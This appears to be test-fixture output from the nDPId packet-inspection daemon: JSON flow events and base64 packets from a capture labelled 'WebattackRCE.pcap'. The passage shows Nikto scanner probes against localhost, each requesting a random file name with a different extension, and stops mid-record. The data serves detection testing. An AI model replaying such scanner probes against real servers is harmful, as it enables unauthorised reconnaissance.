+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1576420276677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276677,"pkt":"AAAAAAAAAAAAAAAACABFAADECABAAEAGNDJ\/AAABfwAAAcGgH5BVFT\/w+l\/OFYAYAED+uAAAAQEICp1m+u2dZvrtR0VUIC8waFhDNlpVRS5leGUgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1576420276678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276678,"pkt":"AAAAAAAAAAAAAAAACABFAADFtjJAAEAGhf5\/AAABfwAAAcGiH5AIK44ii9cP6IAYAED+uQAAAQEICp1m+u6dZvruR0VUIC8waFhDNlpVRS5waHAzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1576420276679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276679,"pkt":"AAAAAAAAAAAAAAAACABFAADEHFNAAEAGH99\/AAABfwAAAcGkH5DblSRB+hg5GYAYAED+uAAAAQEICp1m+u+dZvrvR0VUIC8waFhDNlpVRS5iYXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1576420276680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276680,"pkt":"AAAAAAAAAAAAAAAACABFAADBM9JAAEAGCGN\/AAABfwAAAcGmH5Br4QvDZx90z4AYAED+tQAAAQEICp1m+vCdZvrwR0VUIC8waFhDNlpVRS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1576420276681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276681,"pkt":"AAAAAAAAAAAAAAAACABFAADEACBAAEAGPBJ\/AAABfwAAAcGoH5CXxDgNS2MhWYAYAED+uAAAAQEICp1m+vGdZvrxR0VUIC8waFhDNlpVRS5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1576420276683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276683,"pkt":"AAAAAAAAAAAAAAAACABFAADDkEpAAEAGq+h\/AAABfwAAAcGqH5CEAqhbm4E5vYAYAED+twAAAQEICp1m+vKdZvryR0VUIC8waFhDNlpVRS5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1576420276685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276685,"pkt":"AAAAAAAAAAAAAAAACABFAADE6exAAEAGUkV\/AAABfwAAAcGsH5Ci99H6PnUDOIAYAED+uAAAAQEICp1m+vWdZvr1R0VUIC8waFhDNlpVRS5jbWQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1576420276686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276686,"pkt":"AAAAAAAAAAAAAAAACABFAADEl0RAAEAGpO1\/AAABfwAAAcGuH5BUwq9SBePOj4AYAED+uAAAAQEICp1m+vadZvr2R0VUIC8waFhDNlpVRS5odG0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1576420276687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276687,"pkt":"AAAAAAAAAAAAAAAACABFAADFbA5AAEAG0CJ\/AAABfwAAAcGwH5CxUlQZUrozMIAYAED+uQAAAQEICp1m+vedZvr3R0VUIC8waFhDNlpVRS5odG1sIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1576420276689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276689,"pkt":"AAAAAAAAAAAAAAAACABFAADEYhpAAEAG2hd\/AAABfwAAAcGyH5BKOloN5Bjd7oAYAED+uAAAAQEICp1m+vmdZvr5R0VUIC8waFhDNlpVRS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1576420276690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276690,"pkt":"AAAAAAAAAAAAAAAACABFAADErQxAAEAGjyV\/AAABfwAAAcG0H5DNO5UfftfaRYAYAED+uAAAAQEICp1m+vqdZvr6R0VUIC8waFhDNlpVRS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
